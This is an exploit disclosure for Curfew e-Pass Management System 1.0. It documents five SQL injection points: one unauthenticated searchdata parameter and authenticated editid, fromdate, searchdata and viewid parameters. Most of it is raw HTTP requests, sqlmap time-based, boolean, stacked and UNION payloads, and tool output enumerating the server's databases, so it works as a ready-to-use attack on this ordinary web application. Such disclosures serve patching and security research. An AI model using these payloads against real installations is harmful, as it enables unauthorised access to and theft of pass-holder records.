Curfew e-Pass Management System 1.0 SQL Injection

Curfew e-Pass Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to gh1mau.


MD5 | a86ff9fc24a454605eb91b9a93042a64

# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities
# Google Dork: N/A
# Date: 04.08.2020
# Exploit Author: Mucahit Karadag
# Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661
# Version: 1.0
# Tested on: Ubuntu Server 14.04.6 LTS
# CVE : N/A

###
# Software Description:
# Curfew Pass Management system is a web-based technology that will manage
# the records of pass which issue by administrative. Curfew Pass Management
# System is an automatic system that delivers data processing at a very high
# speed in a systematic manner.
#
# Vulnerabilitiy Description:
# Curfew e-Pass Management System 1.0 web application is vulnerable to
# 5 different SQL injection vulnerabilities in multiple endpoints.
# Vulnerabilities are listed in detail below.
#
# In summary, vulnerabilities are
# Unauthenticated SQL Injection Identified on searchdata Parameter
# Authenticated SQL Injection Identified on editid Parameter
# Authenticated SQL Injection Identified on fromdate Parameter
# Authenticated SQL Injection Identified on searchdata Parameter
# Authenticated SQL Injection Identified on viewid Parameter
###

##
## [Unauthenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/index.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/index.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=&search=

"searchdata" parameter is vulnerable to SQL injection under the search feature in the main page.

Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search=

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search=
---
[09:52:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[09:52:10] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on editid Parameter]
##

GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/manage-category.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1


"editid" parameter is vulnerable to SQL injection on HTTP GET rquest to /admin/edit-category-detail.php endpoint.

---
Parameter: editid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: editid=1 AND 4435=4435

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: editid=1;SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- -
---
[09:54:59] [INFO] testing MySQL
[09:54:59] [INFO] confirming MySQL
[09:54:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:54:59] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on fromdate Parameter]
##

POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

fromdate=2020-08-04&todate=2020-08-26&submit=

---
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit=
---
[09:58:36] [INFO] testing MySQL
[09:58:36] [INFO] confirming MySQL
[09:58:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:58:36] [INFO] fetching database names
[09:58:36] [INFO] fetching number of databases
[09:58:36] [INFO] resumed: 5
[09:58:36] [INFO] resuming partial value: informat
[09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:58:56] [INFO] adjusting time delay to 1 second due to good response times
[09:59:37] [INFO] retrieved: cpms
[09:59:37] [INFO] retrieved: information_schema
[10:00:56] [INFO] retrieved: mysql
[10:02:25] [INFO] retrieved: performance_schema
[10:03:41] [INFO] retrieved: phpmyadmin
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/admin/search-pass.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/search-pass.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=asd&search=

---
Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search=

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=
---
[10:10:57] [INFO] testing MySQL
[10:10:57] [WARNING] reflective value(s) found and filtering out
[10:10:57] [INFO] confirming MySQL
[10:10:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:10:58] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin


##
## [Authenticated SQL Injection Identified on viewid Parameter]
##

GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

---
Parameter: viewid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: viewid=3 AND 2054=2054

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- -
---
[10:12:27] [INFO] testing MySQL
[10:12:27] [INFO] confirming MySQL
[10:12:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:12:28] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

Related Posts